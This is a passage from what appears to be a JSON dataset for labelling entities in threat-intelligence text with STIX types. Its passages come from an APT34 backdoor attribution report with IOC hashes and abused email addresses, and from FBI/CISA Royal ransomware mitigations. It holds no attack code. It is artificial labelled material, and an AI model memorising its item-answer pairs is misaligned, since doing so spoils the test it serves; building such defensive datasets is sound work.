"input": "### Entity:\nfischer556@gmail.com\n\n---\n\n### Text Passage:\nAttribution Analysis\nThere are several data points and indicators that suggest APT34 carried out this attack, and that this group is still active in targeting countries in the Middle East with a special focus on compromising government entities.\n**1\\. The first stage dropper**\nThe first stage dropper between the Saitama backdoor and this new operation\u2019s first stage .Net dropper have a few similarities. Despite the dated Saitama operation\u2019s first stage dropper, a VBA macro that drops the actual .Net backdoor Saitama malware, the new attack implemented in the group\u2019s latest deployment is a .Net dropper that drops the actual malware. Both deployments\u2019 final stages leverage EWS\u2019 Managed API (Microsoft.Exchange.WenServices.dll).\nFigure 17. Saitama backdoor\u2019s first stage dropper (left), and the dropped files for the new APT34 .Net backdoor in the first stage (right)\n**2\\. Leveraging exchange servers for communications (Uni- and bidirectional)**\nBoth this campaign and the Karkoff campaign made use of targeted exchange servers and relayed communications through it. In the previous campaign, this was reportedly done with the deployment of the Karkoff implant. The old Karkoff sample attributed to APT34 share a common functionality for abusing the EWS API.\nFigure 18. The Karkoff implant leveraging EWS (top), and the newer APT34 backdoor\u2019s use of EWS (bottom)\n**3\\. The victim targeted**\nAPT34 has been documented for targeting countries in the Middle East. In a previous campaign analyzed by Yoroi Labs, the Karkoff sample (SHA256: 1f47770cc42ac8805060004f203a5f537b7473a36ff41eabb746900b2fa24cc8) attributed to APT34 has the mail server domain hardcoded inside the sample. Alongside the target mail recipient the attackers receive information from is the same hardcoded mail server domain found in the latest backdoor, including the targeted Exchange Server for a government ministry. Both samples included some hardcoded credentials as well. However, the newer backdoor includes support for stealing the _new_ passwords of previously compromised users who changed their passwords, ensuring their legitimate accounts stay compromised.\nFigure 19. Karkoff implant targeting an army mail server in 2020 (top), and the newer APT backdoor targeting another mail server in 2023 (bottom)\nConclusions\nAt first glance, security teams can mistakenly tag the sample as safe or as a benign activity given the validity of the domains and mail credentials. It will take more experienced analysts to see that the domains abused is part of a bigger active directory domain \u201cforest\u201d, which share a trust relationship with each other to allow different government ministries or agencies to communicate. Considering we found a compromised account from one entity inside a sample sourced from a different agency indicates APT34 now has a deep foothold in the government domain forest.\nFollowing the stages executed, APT34\u2019s repeated use of the Saitama backdoor technique in the first stage indicates a confidence that even the dated malware\u2019s technique will continue to work and initiate compromise.\nThe next stages for exfiltrating data, however, are considerably new and are considered exploratory for the group. Despite the routine's simplicity, the novelty of the second and last stages also indicate that this entire routine can just be a small part of a bigger campaign targeting governments. We continue tracking and monitoring the abuse of this threat to determine the depth and breadth of this compromise.\nIndicators of Compromise (IOCs)\nSHA256 File name Detection\n---------\n5ed7ebc339af6ca6a5d1b9b45db6b3ae00232d9ccd80d5fcadf7680320bd4e6b DevicesSrv.exe Backdoor.MSIL.REDCAP.A\n827366355c6429a7fe12d111e240c5bcec3ed61e717fb84ea8b771672dd1f88e psgfilter.dll Trojan.Win64.REDCAP.AF\nEmails abused\n* Jaqueline.Herrera@proton.me\n* Ciara.Stoneburner@proton.me\n* marsha.fischer556@gmail.com\n* Kathryn.Firkins@proton.me\n* Susan.potts454@proton.me\n* Earl.butler945@gmail.com\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n827366355c6429a7fe12d111e240c5bcec3ed61e717fb84ea8b771672dd1f88e\n\n---\n\n### Text Passage:\nAttribution Analysis\nThere are several data points and indicators that suggest APT34 carried out this attack, and that this group is still active in targeting countries in the Middle East with a special focus on compromising government entities.\n**1\\. The first stage dropper**\nThe first stage dropper between the Saitama backdoor and this new operation\u2019s first stage .Net dropper have a few similarities. Despite the dated Saitama operation\u2019s first stage dropper, a VBA macro that drops the actual .Net backdoor Saitama malware, the new attack implemented in the group\u2019s latest deployment is a .Net dropper that drops the actual malware. Both deployments\u2019 final stages leverage EWS\u2019 Managed API (Microsoft.Exchange.WenServices.dll).\nFigure 17. Saitama backdoor\u2019s first stage dropper (left), and the dropped files for the new APT34 .Net backdoor in the first stage (right)\n**2\\. Leveraging exchange servers for communications (Uni- and bidirectional)**\nBoth this campaign and the Karkoff campaign made use of targeted exchange servers and relayed communications through it. In the previous campaign, this was reportedly done with the deployment of the Karkoff implant. The old Karkoff sample attributed to APT34 share a common functionality for abusing the EWS API.\nFigure 18. The Karkoff implant leveraging EWS (top), and the newer APT34 backdoor\u2019s use of EWS (bottom)\n**3\\. The victim targeted**\nAPT34 has been documented for targeting countries in the Middle East. In a previous campaign analyzed by Yoroi Labs, the Karkoff sample (SHA256: 1f47770cc42ac8805060004f203a5f537b7473a36ff41eabb746900b2fa24cc8) attributed to APT34 has the mail server domain hardcoded inside the sample. Alongside the target mail recipient the attackers receive information from is the same hardcoded mail server domain found in the latest backdoor, including the targeted Exchange Server for a government ministry. Both samples included some hardcoded credentials as well. However, the newer backdoor includes support for stealing the _new_ passwords of previously compromised users who changed their passwords, ensuring their legitimate accounts stay compromised.\nFigure 19. Karkoff implant targeting an army mail server in 2020 (top), and the newer APT backdoor targeting another mail server in 2023 (bottom)\nConclusions\nAt first glance, security teams can mistakenly tag the sample as safe or as a benign activity given the validity of the domains and mail credentials. It will take more experienced analysts to see that the domains abused is part of a bigger active directory domain \u201cforest\u201d, which share a trust relationship with each other to allow different government ministries or agencies to communicate. Considering we found a compromised account from one entity inside a sample sourced from a different agency indicates APT34 now has a deep foothold in the government domain forest.\nFollowing the stages executed, APT34\u2019s repeated use of the Saitama backdoor technique in the first stage indicates a confidence that even the dated malware\u2019s technique will continue to work and initiate compromise.\nThe next stages for exfiltrating data, however, are considerably new and are considered exploratory for the group. Despite the routine's simplicity, the novelty of the second and last stages also indicate that this entire routine can just be a small part of a bigger campaign targeting governments. We continue tracking and monitoring the abuse of this threat to determine the depth and breadth of this compromise.\nIndicators of Compromise (IOCs)\nSHA256 File name Detection\n---------\n5ed7ebc339af6ca6a5d1b9b45db6b3ae00232d9ccd80d5fcadf7680320bd4e6b DevicesSrv.exe Backdoor.MSIL.REDCAP.A\n827366355c6429a7fe12d111e240c5bcec3ed61e717fb84ea8b771672dd1f88e psgfilter.dll Trojan.Win64.REDCAP.AF\nEmails abused\n* Jaqueline.Herrera@proton.me\n* Ciara.Stoneburner@proton.me\n* marsha.fischer556@gmail.com\n* Kathryn.Firkins@proton.me\n* Susan.potts454@proton.me\n* Earl.butler945@gmail.com\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n5ed7ebc339af6ca6a5d1b9b45db6b3ae00232d9ccd80d5fcadf7680320bd4e6b\n\n---\n\n### Text Passage:\nAttribution Analysis\nThere are several data points and indicators that suggest APT34 carried out this attack, and that this group is still active in targeting countries in the Middle East with a special focus on compromising government entities.\n**1\\. The first stage dropper**\nThe first stage dropper between the Saitama backdoor and this new operation\u2019s first stage .Net dropper have a few similarities. Despite the dated Saitama operation\u2019s first stage dropper, a VBA macro that drops the actual .Net backdoor Saitama malware, the new attack implemented in the group\u2019s latest deployment is a .Net dropper that drops the actual malware. Both deployments\u2019 final stages leverage EWS\u2019 Managed API (Microsoft.Exchange.WenServices.dll).\nFigure 17. Saitama backdoor\u2019s first stage dropper (left), and the dropped files for the new APT34 .Net backdoor in the first stage (right)\n**2\\. Leveraging exchange servers for communications (Uni- and bidirectional)**\nBoth this campaign and the Karkoff campaign made use of targeted exchange servers and relayed communications through it. In the previous campaign, this was reportedly done with the deployment of the Karkoff implant. The old Karkoff sample attributed to APT34 share a common functionality for abusing the EWS API.\nFigure 18. The Karkoff implant leveraging EWS (top), and the newer APT34 backdoor\u2019s use of EWS (bottom)\n**3\\. The victim targeted**\nAPT34 has been documented for targeting countries in the Middle East. In a previous campaign analyzed by Yoroi Labs, the Karkoff sample (SHA256: 1f47770cc42ac8805060004f203a5f537b7473a36ff41eabb746900b2fa24cc8) attributed to APT34 has the mail server domain hardcoded inside the sample. Alongside the target mail recipient the attackers receive information from is the same hardcoded mail server domain found in the latest backdoor, including the targeted Exchange Server for a government ministry. Both samples included some hardcoded credentials as well. However, the newer backdoor includes support for stealing the _new_ passwords of previously compromised users who changed their passwords, ensuring their legitimate accounts stay compromised.\nFigure 19. Karkoff implant targeting an army mail server in 2020 (top), and the newer APT backdoor targeting another mail server in 2023 (bottom)\nConclusions\nAt first glance, security teams can mistakenly tag the sample as safe or as a benign activity given the validity of the domains and mail credentials. It will take more experienced analysts to see that the domains abused is part of a bigger active directory domain \u201cforest\u201d, which share a trust relationship with each other to allow different government ministries or agencies to communicate. Considering we found a compromised account from one entity inside a sample sourced from a different agency indicates APT34 now has a deep foothold in the government domain forest.\nFollowing the stages executed, APT34\u2019s repeated use of the Saitama backdoor technique in the first stage indicates a confidence that even the dated malware\u2019s technique will continue to work and initiate compromise.\nThe next stages for exfiltrating data, however, are considerably new and are considered exploratory for the group. Despite the routine's simplicity, the novelty of the second and last stages also indicate that this entire routine can just be a small part of a bigger campaign targeting governments. We continue tracking and monitoring the abuse of this threat to determine the depth and breadth of this compromise.\nIndicators of Compromise (IOCs)\nSHA256 File name Detection\n---------\n5ed7ebc339af6ca6a5d1b9b45db6b3ae00232d9ccd80d5fcadf7680320bd4e6b DevicesSrv.exe Backdoor.MSIL.REDCAP.A\n827366355c6429a7fe12d111e240c5bcec3ed61e717fb84ea8b771672dd1f88e psgfilter.dll Trojan.Win64.REDCAP.AF\nEmails abused\n* Jaqueline.Herrera@proton.me\n* Ciara.Stoneburner@proton.me\n* marsha.fischer556@gmail.com\n* Kathryn.Firkins@proton.me\n* Susan.potts454@proton.me\n* Earl.butler945@gmail.com\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\ngmail.com\n\n---\n\n### Text Passage:\nAttribution Analysis\nThere are several data points and indicators that suggest APT34 carried out this attack, and that this group is still active in targeting countries in the Middle East with a special focus on compromising government entities.\n**1\\. The first stage dropper**\nThe first stage dropper between the Saitama backdoor and this new operation\u2019s first stage .Net dropper have a few similarities. Despite the dated Saitama operation\u2019s first stage dropper, a VBA macro that drops the actual .Net backdoor Saitama malware, the new attack implemented in the group\u2019s latest deployment is a .Net dropper that drops the actual malware. Both deployments\u2019 final stages leverage EWS\u2019 Managed API (Microsoft.Exchange.WenServices.dll).\nFigure 17. Saitama backdoor\u2019s first stage dropper (left), and the dropped files for the new APT34 .Net backdoor in the first stage (right)\n**2\\. Leveraging exchange servers for communications (Uni- and bidirectional)**\nBoth this campaign and the Karkoff campaign made use of targeted exchange servers and relayed communications through it. In the previous campaign, this was reportedly done with the deployment of the Karkoff implant. The old Karkoff sample attributed to APT34 share a common functionality for abusing the EWS API.\nFigure 18. The Karkoff implant leveraging EWS (top), and the newer APT34 backdoor\u2019s use of EWS (bottom)\n**3\\. The victim targeted**\nAPT34 has been documented for targeting countries in the Middle East. In a previous campaign analyzed by Yoroi Labs, the Karkoff sample (SHA256: 1f47770cc42ac8805060004f203a5f537b7473a36ff41eabb746900b2fa24cc8) attributed to APT34 has the mail server domain hardcoded inside the sample. Alongside the target mail recipient the attackers receive information from is the same hardcoded mail server domain found in the latest backdoor, including the targeted Exchange Server for a government ministry. Both samples included some hardcoded credentials as well. However, the newer backdoor includes support for stealing the _new_ passwords of previously compromised users who changed their passwords, ensuring their legitimate accounts stay compromised.\nFigure 19. Karkoff implant targeting an army mail server in 2020 (top), and the newer APT backdoor targeting another mail server in 2023 (bottom)\nConclusions\nAt first glance, security teams can mistakenly tag the sample as safe or as a benign activity given the validity of the domains and mail credentials. It will take more experienced analysts to see that the domains abused is part of a bigger active directory domain \u201cforest\u201d, which share a trust relationship with each other to allow different government ministries or agencies to communicate. Considering we found a compromised account from one entity inside a sample sourced from a different agency indicates APT34 now has a deep foothold in the government domain forest.\nFollowing the stages executed, APT34\u2019s repeated use of the Saitama backdoor technique in the first stage indicates a confidence that even the dated malware\u2019s technique will continue to work and initiate compromise.\nThe next stages for exfiltrating data, however, are considerably new and are considered exploratory for the group. Despite the routine's simplicity, the novelty of the second and last stages also indicate that this entire routine can just be a small part of a bigger campaign targeting governments. We continue tracking and monitoring the abuse of this threat to determine the depth and breadth of this compromise.\nIndicators of Compromise (IOCs)\nSHA256 File name Detection\n---------\n5ed7ebc339af6ca6a5d1b9b45db6b3ae00232d9ccd80d5fcadf7680320bd4e6b DevicesSrv.exe Backdoor.MSIL.REDCAP.A\n827366355c6429a7fe12d111e240c5bcec3ed61e717fb84ea8b771672dd1f88e psgfilter.dll Trojan.Win64.REDCAP.AF\nEmails abused\n* Jaqueline.Herrera@proton.me\n* Ciara.Stoneburner@proton.me\n* marsha.fischer556@gmail.com\n* Kathryn.Firkins@proton.me\n* Susan.potts454@proton.me\n* Earl.butler945@gmail.com\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nRoyal\n\n---\n\n### Text Passage:\n**MITIGATIONS**\nThese mitigations apply to all critical infrastructure organizations and network defenders. FBI and CISA recommend that software manufactures incorporate secure-by-design and -default principles and tactics into their software development practices limiting the impact of ransomware techniques (such as threat actors leveraging backdoor vulnerabilities into remote software systems) thus strengthening the security posture for their customers.\nFor more information on secure by design, see CISA\u2019s Secure by Design webpage and joint guide.\nFBI and CISA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the risk of compromise by Royal ransomware. These mitigations follow CISA\u2019s Cybersecurity Performance Goals (CPGs), which provide a minimum set of practices and protections that are informed by the most common and impactful threats, TTPs, and yield goals that all organizations across critical infrastructure sectors should implement.\n* **Implement a recovery plan** to maintain and retain multiple copies of sensitive or proprietary data and servers [CPG 7.3] n a physically separate, segmented, and secure location (i.e., hard drive, storage device, or the cloud).\n* **Require all accounts** with password logins (e.g., service account, admin accounts, and domain admin accounts) **to comply** with the National Institute for Standards and Technology\u2019s (NIST\u2019s) standards for developing and managing password policies [CPG 3.4].\n* Use longer passwords consisting of at least 8 characters and no more than 64 characters in length [CPG 1.4].\n* Store passwords in hashed format using industry-recognized password managers.\n* Add password user \u201csalts\u201d to shared login credentials.\n* Avoid reusing passwords.\n* Implement multiple failed login attempt account lockouts [CPG 1.1].\n* Disable password hints.\n* Refrain from requiring password changes more frequently than once per year.\n**Note:** NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password patterns cyber criminals can easily decipher.\n* Require administrator credentials to install software.\n* **Require multifactor authentication**[CPG 1.3] for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems.\n* **Reduce the threat of malicious actors** using remote access tools by applying mitigations in joint Guide to Securing Remote Access Software.\n* **Keep all operating systems, software, and firmware up to date.** Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats.\n* **Segment networks**[CPG 8.1]. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between\u2014and access to\u2014various subnetworks and by restricting adversary lateral movement.\n* **Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool.** To aid in detecting ransomware, implement a tool that logs and reports all network traffic [CPG 5.1], including lateral movement activity on a network. Endpoint detection and response (EDR) tools are useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.\n* **Install, regularly update, and enable real time detection for antivirus software** on all hosts.\n* **Review domain controllers, servers, workstations, and active directories** for new and/or unrecognized accounts.\n* **Audit user accounts** with administrative privileges and configure access controls according to the principle of least privilege (PoLP) [CPG 1.5].\n* **Disable unused ports**.\n* **Consider adding an email banner to emails**[CPG 8.3] received from outside your organization.\n* **Implement time-based access for accounts set at the admin level and higher.** For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the PoLP (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the active directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.\n* **Disable command-line and scripting activities and permissions**. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally.\n* **Maintain offline backups of data,** and regularly maintain backup and restoration [CPG 7.3]. By instituting this practice, the organization ensures they will not be severely interrupted, and/or only have irretrievable data.\n* **Ensure all backup data is encrypted, immutable**(i.e., cannot be altered or deleted), and covers the entire organization\u2019s data infrastructure [CPG 3.3].\n",
"output": "MALWARE"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nFBI\n\n---\n\n### Text Passage:\n**MITIGATIONS**\nThese mitigations apply to all critical infrastructure organizations and network defenders. FBI and CISA recommend that software manufactures incorporate secure-by-design and -default principles and tactics into their software development practices limiting the impact of ransomware techniques (such as threat actors leveraging backdoor vulnerabilities into remote software systems) thus strengthening the security posture for their customers.\nFor more information on secure by design, see CISA\u2019s Secure by Design webpage and joint guide.\nFBI and CISA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the risk of compromise by Royal ransomware. These mitigations follow CISA\u2019s Cybersecurity Performance Goals (CPGs), which provide a minimum set of practices and protections that are informed by the most common and impactful threats, TTPs, and yield goals that all organizations across critical infrastructure sectors should implement.\n* **Implement a recovery plan** to maintain and retain multiple copies of sensitive or proprietary data and servers [CPG 7.3] n a physically separate, segmented, and secure location (i.e., hard drive, storage device, or the cloud).\n* **Require all accounts** with password logins (e.g., service account, admin accounts, and domain admin accounts) **to comply** with the National Institute for Standards and Technology\u2019s (NIST\u2019s) standards for developing and managing password policies [CPG 3.4].\n* Use longer passwords consisting of at least 8 characters and no more than 64 characters in length [CPG 1.4].\n* Store passwords in hashed format using industry-recognized password managers.\n* Add password user \u201csalts\u201d to shared login credentials.\n* Avoid reusing passwords.\n* Implement multiple failed login attempt account lockouts [CPG 1.1].\n* Disable password hints.\n* Refrain from requiring password changes more frequently than once per year.\n**Note:** NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password patterns cyber criminals can easily decipher.\n* Require administrator credentials to install software.\n* **Require multifactor authentication**[CPG 1.3] for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems.\n* **Reduce the threat of malicious actors** using remote access tools by applying mitigations in joint Guide to Securing Remote Access Software.\n* **Keep all operating systems, software, and firmware up to date.** Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats.\n* **Segment networks**[CPG 8.1]. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between\u2014and access to\u2014various subnetworks and by restricting adversary lateral movement.\n* **Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool.** To aid in detecting ransomware, implement a tool that logs and reports all network traffic [CPG 5.1], including lateral movement activity on a network. Endpoint detection and response (EDR) tools are useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.\n* **Install, regularly update, and enable real time detection for antivirus software** on all hosts.\n* **Review domain controllers, servers, workstations, and active directories** for new and/or unrecognized accounts.\n* **Audit user accounts** with administrative privileges and configure access controls according to the principle of least privilege (PoLP) [CPG 1.5].\n* **Disable unused ports**.\n* **Consider adding an email banner to emails**[CPG 8.3] received from outside your organization.\n* **Implement time-based access for accounts set at the admin level and higher.** For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the PoLP (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the active directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.\n* **Disable command-line and scripting activities and permissions**. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally.\n* **Maintain offline backups of data,** and regularly maintain backup and restoration [CPG 7.3]. By instituting this practice, the organization ensures they will not be severely interrupted, and/or only have irretrievable data.\n* **Ensure all backup data is encrypted, immutable**(i.e., cannot be altered or deleted), and covers the entire organization\u2019s data infrastructure [CPG 3.3].\n",
"output": "IDENTITY"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
